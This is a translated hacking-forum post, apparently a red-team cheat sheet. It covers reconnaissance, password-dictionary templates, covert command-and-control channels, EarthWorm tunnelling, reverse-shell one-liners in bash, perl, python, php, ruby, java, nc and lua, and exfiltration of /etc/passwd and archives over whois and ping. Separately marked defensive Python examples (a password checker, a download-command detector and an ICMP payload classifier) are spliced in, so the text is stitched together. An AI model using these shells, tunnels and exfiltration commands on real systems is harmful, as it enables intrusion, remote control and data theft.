taibeihacker
Moderator
Information gathering
Open-source intelligence (OSINT)
GitHub
Github_Nuggests (automatically crawls GitHub for sensitive information leaked in files): https://github.com/az0ne/Github_Nuggests
GSIL (near-real-time discovery, within 15 minutes, of information leaked on GitHub): https://github.com/FeeiCN/GSIL
x-patrol (from the Xiaomi team): https://github.com/MiSecurity/x-patrol
WHOIS lookup / registrant reverse lookup / email reverse lookup / related assets
Chinaz (站長之家): http://whois.chinaz.com/?DomainName=target.com&ws=
Aizhan (愛站): https://whois.aizhan.com/target.com/
ThreatBook (微步在線): https://x.threatbook.cn/
IP reverse lookup: https://dns.aizhan.com/
Tianyancha (天眼查): https://www.tianyancha.com/
Whomx (虎媽查): http://www.whomx.com/
Historical vulnerability lookup, online: http://wy.zone.ci/
Self-hosted: https://github.com/hanc00l/wooyun_publi/
Google hacking
Building an enterprise password dictionary
Dictionary lists
passwordlist: https://github.com/lavalamp-/password-lists
Zhuzhuxia's dictionary (豬豬俠字典): https://pan.baidu.com/s/1dFJyedz
Blasting_dictionary (shares and collects dictionaries of all kinds: weak passwords, common passwords, directory brute-forcing, database, editor and admin-panel brute-forcing, etc.)
For a specific vendor, focus on building a dictionary around the vendor's own domain names; %pwd% and %user% in the templates below are placeholders:
['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
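The same templates are just as useful on the defensive side. Below is an added example (not from the original post or any of the tools it links) that expands them for a given company domain and account name, so a password-policy check can reject exactly the candidates such a dictionary would hit first. It assumes %pwd% stands for a word derived from the company's domain and %user% for the account name; the post does not define the placeholders, and the domain and user values are constructed.

```python
# Added example: screen candidate passwords against the company-derived templates.
# Assumption: %pwd% = word derived from the company domain, %user% = account name.

TEMPLATES = [
    '%pwd%123', '%user%123', '%user%521', '%user%2017', '%pwd%321', '%pwd%521',
    '%user%321', '%pwd%123!', '%pwd%123!@#', '%pwd%1234', '%user%2016',
    '%user%123$%^', '%user%123!@#', '%pwd%2016', '%pwd%2017', '%pwd%1!',
    '%pwd%2@', '%pwd%3#', '%pwd%123#@!', '%pwd%12345', '%pwd%123$%^',
    '%pwd%!@#456', '%pwd%123qwe', '%pwd%qwe123', '%pwd%qwe', '%pwd%123456',
    '%user%123#@!', '%user%!@#456', '%user%1234', '%user%12345',
    '%user%123456', '%user%123!',
]

# Trailing labels treated as public suffix when deriving words from a domain (small illustrative set)
PUBLIC_SUFFIX_LABELS = {'com', 'cn', 'net', 'org', 'co', 'io', 'edu', 'gov'}
# Host labels that carry no company identity
GENERIC_HOST_LABELS = {'www', 'mail', 'vpn', 'oa', 'smtp', 'portal'}


def base_words_from_domain(domain):
    """Derive candidate base words (the %pwd% part) from a company domain."""
    labels = [l for l in domain.lower().strip().split('.') if l]
    while labels and labels[-1] in PUBLIC_SUFFIX_LABELS:
        labels.pop()
    words = set()
    for label in labels:
        if label in GENERIC_HOST_LABELS:
            continue
        words.add(label)
        words.add(label.replace('-', ''))
        words.update(part for part in label.split('-') if len(part) >= 3)
    return sorted(words)


def company_dictionary(domain, username):
    """Expand every template for this domain and user: the set to block."""
    words = base_words_from_domain(domain)
    out = set()
    for t in TEMPLATES:
        if '%user%' in t:
            out.add(t.replace('%user%', username.lower()))
        else:
            for w in words:
                out.add(t.replace('%pwd%', w))
    return out


def matching_template(candidate, domain, username):
    """Return the template a candidate matches (case-insensitively), or None."""
    cand = candidate.lower()
    words = base_words_from_domain(domain)
    for t in TEMPLATES:
        if '%user%' in t:
            if cand == t.replace('%user%', username.lower()):
                return t
        elif any(cand == t.replace('%pwd%', w) for w in words):
            return t
    return None


def check_password(candidate, domain, username):
    """Policy decision as (accepted, reason)."""
    t = matching_template(candidate, domain, username)
    if t is not None:
        return False, 'matches company-derived pattern %s' % t
    if len(candidate) < 12:
        return False, 'shorter than 12 characters'
    return True, 'ok'


if __name__ == '__main__':
    # constructed sample domain and account
    for pw in ('Examplecorp123!@#', 'alice2017', 'Tr0ub4dor&3-horse-battery'):
        print(pw, check_password(pw, 'vpn.example-corp.com.cn', 'alice'))
```

The comparison is case-insensitive on purpose: the templates in the post are lowercase, but users capitalise the company name and attackers' rule sets do the same, so a policy that only blocks the exact lowercase strings would miss most real hits.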
Password generation
GenpAss (a weak-password generator with Chinese characteristics): https://github.com/RicterZ/genpAss/
passmaker (a password-dictionary generator with customizable rules): https://github.com/bit4woo/passmaker
pydictor (a powerful password generator): https://github.com/LandGrey/pydictor
Obtaining email lists
theHarvester: https://github.com/laramies/theHarvester
Once one mailbox is obtained, export its address book
LinkedInt: https://github.com/mdsecactivebreach/LinkedInt
Mailget: https://github.com/Ridter/Mailget
Leaked password lookup
ghostproject: https://ghostproject.fr/
pwndb: https://pwndb2am4tzkvold.onion.to/
Collecting information on the enterprise's external assets
Subdomain enumeration
Layer Subdomain Miner 4.2 commemorative edition
subDomainsBrute: https://github.com/lijiejie/subDomainsBrute
wydomain: https://github.com/ring04h/wydomain
Sublist3r: https://github.com/aboul3la/Sublist3r
site:target.com (Google): https://www.google.com
GitHub code repositories
Capture traffic and inspect request and response values (redirects, file uploads, app and API endpoints, etc.)
Online lookup sites such as the webmaster-helper "links" service
Zone transfer vulnerability
Linux
dig @ns.example.com example.com AXFR
Windows
nslookup -type=ns xxx.yyy.cn  # query the DNS servers authoritative for the domain
nslookup  # enter nslookup interactive mode
server dns.domain.com  # select the DNS server to query
ls xxx.yyy.cn  # list the zone's records
GetDomainsBySSL.py: https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/
censys.io certificates: https://censys.io/certificates?q=target.com
crt.sh certificate search: https://crt.sh/?q=%.target.com
shodan: https://www.shodan.io/
zoomeye :https://www.zoomeye.org/
fofa :https://fofa.so/
censys:https://censys.io/
dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com
api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com
community.riskiq.com :https://community.riskiq.com/Search/target.com
subdomain3 :https://github.com/yanxiu0614/subdomain3
FuzzDomain :https://github.com/Chora10/FuzzDomain
dnsdumpster.com :https://dnsdumpster.com/
phpinfo.me :https://phpinfo.me/domain/
DNS open data API: https://dns.bufferover.run/dns?q=baidu.com
Getting into the intranet
Via weak enterprise accounts
VPN (obtain VPN access through mailboxes, password brute-forcing, social engineering, etc.)
Enterprise operations systems (Zabbix, etc.)
Via system vulnerabilities
Metasploit (exploitation framework): https://github.com/rapid7/metasploit-framework
Exploit scripts
Web application penetration
SQL injection
Cross-site scripting (XSS)
Cross-site request forgery (CSRF)
SSRF (ssrf_proxy)
Functional / business-logic vulnerabilities
Other vulnerabilities
CMS (content management system) vulnerabilities
Enterprise self-built proxies
Wireless Wi-Fi access
Covert attacks
Command and Control
ICMP: https://pentestlab.blog/2017/07/28/command-and-control-icmp/
DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/
DropBox :https://pentestlab.blog/2017/08/29/command-and-control-dropbox/
Gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/
Telegram :http://drops.xmd5.com/static/drops/tips-16142.html
Twitter :https://pentestlab.blog/2017/09/26/command-and-control-twitter/
Website Keyword :https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/
PowerShell :https://pentestlab.blog/2017/08/19/command-and-control-powershell/
Windows COM :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
WebDAV :https://pentestlab.blog/2017/09/12/command-and-control-webdav/
Office 365 :https://www.anquanke.com/post/id/86974
HTTPS :https://pentestlab.blog/2017/10/04/command-and-control-https/
Kernel :https://pentestlab.blog/2017/10/02/command-and-control-kernel/
Website :https://pentestlab.blog/2017/11/14/command-and-control-website/
WMI :https://pentestlab.blog/2017/11/20/command-and-control-wmi/
WebSocket :https://pentestlab.blog/2017/12/06/command-and-control-websocket/
Images :https://pentestlab.blog/2018/01/02/command-and-control-images/
Web Interface :https://pentestlab.blog/2018/01/03/command-and-control-web-interface/
JavaScript :https://pentestlab.blog/2018/01/08/command-and-control-javascript/
Fronting
Domain Fronting
Tor Fronting
Proxies
VPN
HTTP: http://cn-proxy.com/
Tor
Intranet cross-boundary applications
Intranet cross-boundary forwarding
NC port forwarding
LCX port forwarding
nps
Proxy scripts: Tunna
Reduh
Intranet cross-boundary proxy tunnelling
EW (EarthWorm)
Forward SOCKS v5 server: ./ew -s ssocksd -l 1080
Reverse SOCKS v5 server:
a) First, on host A (which has a public IP), run:
$ ./ew -s rcsocks -l 1080 -e 8888
b) On target host B, start the SOCKS v5 service and bounce it to port 8888 on the public host:
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
Multi-level cascading
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
Usage of lcx_tran
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
Usage of lcx_listen and lcx_slave
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
A local SOCKS test case for "three-level cascading", for reference
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite
Usage: https://rootkiter.com/Termite/README.txt
Proxy scripts
reGeorg: https://github.com/sensepost/reGeorg
Reverse shells
bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
nc
# with -e
nc -e /bin/sh 223.8.200.234 1234
# without -e
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Intranet file transfer and download
wput
wput dir_name ftp://linuxpig:[email protected]/
wget
wget http://site.com/1.rar -O 1.rar
aria2c (needs to be installed)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
PowerShell
$p = New-Object System.Net.WebClient
$p.DownloadFile('http://domain/file', 'C:%homepath%file')
VBS script
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1  ' 1 = adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile "C:\%homepath%\file", 2  ' 2 = adSaveCreateOverWrite
end with
Run: cscript test.vbs
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore('http://domain/file', 'file');
Run: perl test.pl
Python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')  # binary mode so non-text files are not mangled
localFile.write(u.read())
localFile.close()
Run: python test.py
Ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start('www.domain.com') { |http|
  r = http.get('/file')
  open('save_location', 'wb') { |file|
    file.write(r.body)
  }
}
Run: ruby test.rb
PHP
<?php
$url = 'http://www.example.com/file';
$path = '/path/to/file';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>
Run: php test.php
NC
Attacker:
cat file | nc -l 1234
Target:
nc host_ip 1234 > file
FTP
ftp 127.0.0.1
username
password
get file
exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Windows file share
net use x: \\127.0.0.1\share /user:example.com\userID myPassword
SCP
Local to remote
scp file [email protected]:/tmp
Remote to local
scp [email protected]:/tmp file
rsync
Copy files from a remote rsync server to the local machine
rsync -av [email protected]:www /databack
Copy files from the local machine to a remote rsync server
rsync -av /databack [email protected]:www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
copy
copy \\IP\ShareName\file.exe file.exe
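The Windows transfer methods above (certutil, bitsadmin, the PowerShell WebClient, tftp, copy from an IP-addressed share) are all ordinary signed binaries, so the practical detection is on command lines in process-creation logs. The following added example (my code, not from the post) runs a small rule set over constructed log lines; the "timestamp|user|image|commandline" layout and the regexes are my assumptions, not any product's schema.

```python
# Added example: match LOLBin download/transfer command lines in constructed
# process-creation records of the form "timestamp|user|image|commandline".
import re

RULES = [
    ('certutil_urlcache',
     re.compile(r'\bcertutil(\.exe)?\b.*-urlcache\b.*-f\s+\S*https?://', re.I)),
    ('bitsadmin_transfer',
     re.compile(r'\bbitsadmin(\.exe)?\s+/transfer\b.*https?://', re.I)),
    ('powershell_webclient',
     re.compile(r'\bpowershell(\.exe)?\b.*(Net\.WebClient|DownloadFile|DownloadString)', re.I)),
    ('tftp_transfer',
     re.compile(r'\btftp(\.exe)?\s+-i\s+\S+\s+(get|put)\b', re.I)),
    # copy from a share addressed by raw IP rather than a hostname
    ('copy_from_ip_share',
     re.compile(r'\bcopy\s+\\\\\d{1,3}(\.\d{1,3}){3}\\', re.I)),
]


def parse_line(line):
    """Split one record; the command line may itself contain '|' so limit the split."""
    ts, user, image, cmdline = line.rstrip('\n').split('|', 3)
    return {'ts': ts, 'user': user, 'image': image, 'cmdline': cmdline}


def match_rules(cmdline):
    """Names of all rules that fire on a command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_log(lines):
    """Return [(line_no, user, rule_name)] for every rule hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_line(line)
        for name in match_rules(ev['cmdline']):
            hits.append((n, ev['user'], name))
    return hits


# Constructed sample records; lines 2 and 7 are benign uses of the same binaries.
SAMPLE_LOG = [
    "2024-01-01T10:00:01|CORP\\alice|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f http://site.com/file",
    "2024-01-01T10:00:02|CORP\\alice|C:\\Windows\\System32\\certutil.exe|certutil -hashfile setup.exe SHA256",
    "2024-01-01T10:00:03|CORP\\bob|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer n http://domain/file c:\\Users\\bob\\file",
    "2024-01-01T10:00:04|CORP\\bob|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -c \"$p=New-Object System.Net.WebClient;$p.DownloadFile('http://domain/file','C:\\Users\\bob\\file')\"",
    "2024-01-01T10:00:05|CORP\\carol|C:\\Windows\\System32\\tftp.exe|tftp -i 10.0.0.1 GET file C:\\Users\\carol\\file",
    "2024-01-01T10:00:06|CORP\\carol|C:\\Windows\\System32\\cmd.exe|cmd /c copy \\\\10.0.0.5\\share\\file.exe file.exe",
    "2024-01-01T10:00:07|CORP\\carol|C:\\Windows\\System32\\cmd.exe|cmd /c copy \\\\fileserver\\share\\report.docx .",
]

if __name__ == '__main__':
    for line_no, user, rule in scan_log(SAMPLE_LOG):
        print('line %d user %s -> %s' % (line_no, user, rule))
```

The rules key on the argument that makes the binary fetch something over the network (-urlcache plus a URL, /transfer plus a URL, WebClient/DownloadFile), not on the binary name alone, which is why the hash check and the hostname-addressed copy pass through.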
WHOIS
Receiver, host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
Sender, host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
WHOIS + TAR
First:
ncat -k -l -p 4444 | tee files.b64  # tee to a file so you can make sure you have it
Next:
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally:
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv  # to get the files out
PING
Sender:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
Receiver, ping_receiver.py:
import sys
try:
    from scapy.all import *
except ImportError:
    print('Scapy not found, please install scapy: pip install scapy')
    sys.exit(0)

def process_packet(pkt):
    # each echo request carries one 4-byte chunk (the "ping -p" pattern) at the end of its payload
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
        data = pkt[ICMP].load[-4:]
        print(data.decode('utf-8'), flush=True, end='')

# the post as extracted stops at the print above; this sniff loop is the assumed remainder needed to run the script
sniff(filter='icmp', prn=process_packet)
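On the receiving network, the giveaway of the ping channel above is the payload: "ping -p" repeats a caller-chosen pattern through the data field, whereas stock ping fills it with a fixed sequence. The following added example (my code, not from the post) classifies echo-request payloads on that basis; the packets it checks are constructed byte strings, and the default-filler rules reflect iputils ping on Linux (8-byte timestamp, then data[i] == i) and the cycled "abcdefghijklmnopqrstuvw" alphabet of Windows ping.

```python
# Added example: classify ICMP echo-request payloads as default filler,
# repeated custom pattern (what "ping -p" produces), or non-standard data.

TIMESTAMP_LEN = 8  # iputils ping: 8-byte timestamp, then data[i] == i for i >= 8
WINDOWS_ALPHABET = b'abcdefghijklmnopqrstuvw'  # cycled to fill Windows ping payloads


def is_default_ping_payload(data):
    """True for the stock Linux or Windows filler (and for payloads too short to carry data)."""
    if data and all(data[i] == WINDOWS_ALPHABET[i % len(WINDOWS_ALPHABET)]
                    for i in range(len(data))):
        return True
    return all(data[i] == (i & 0xff) for i in range(TIMESTAMP_LEN, len(data)))


def repeated_pattern_period(data, start=TIMESTAMP_LEN, max_period=16):
    """Smallest period p such that data[start:] is a p-byte unit repeated at
    least twice (the shape "ping -p" leaves behind), or None."""
    tail = data[start:]
    for p in range(1, max_period + 1):
        if len(tail) >= 2 * p and all(tail[i] == tail[i % p] for i in range(len(tail))):
            return p
    return None


def classify_payload(data):
    """('default', None) | ('custom-pattern', period) | ('non-standard', None)"""
    if is_default_ping_payload(data):
        return ('default', None)
    p = repeated_pattern_period(data)
    if p is not None:
        return ('custom-pattern', p)
    return ('non-standard', None)


def find_covert_echo(packets):
    """packets: iterable of (src, dst, payload_bytes) for ICMP type 8.
    Returns [(src, dst, label, period)] for every non-default payload."""
    hits = []
    for src, dst, data in packets:
        label, period = classify_payload(data)
        if label != 'default':
            hits.append((src, dst, label, period))
    return hits


# Constructed samples
LINUX_DEFAULT = bytes(TIMESTAMP_LEN) + bytes(range(TIMESTAMP_LEN, 56))
WINDOWS_DEFAULT = b'abcdefghijklmnopqrstuvwabcdefghi'
# what the "xxd -p -c 4 ... | ping -p" loop above yields for the 4 bytes "pass"
PATTERN_PAYLOAD = bytes(TIMESTAMP_LEN) + b'pass' * 12
RANDOM_PAYLOAD = bytes(TIMESTAMP_LEN) + bytes([0x3a, 0x91, 0x07, 0xc4, 0x5e, 0x12, 0x88, 0xf0])

SAMPLE_PACKETS = [
    ('10.0.0.7', '10.0.0.1', LINUX_DEFAULT),
    ('10.0.0.8', '10.0.0.1', WINDOWS_DEFAULT),
    ('10.0.0.9', '203.0.113.5', PATTERN_PAYLOAD),
    ('10.0.0.9', '203.0.113.5', RANDOM_PAYLOAD),
]

if __name__ == '__main__':
    for src, dst, label, period in find_covert_echo(SAMPLE_PACKETS):
        print('%s -> %s: %s period=%s' % (src, dst, label, period))
```

A custom pattern by itself is not proof of exfiltration (some monitoring tools set -p too), so in practice this is scored together with volume: one echo request per 4 bytes of secret means a 1 MB file shows up as a quarter of a million pings to one destination.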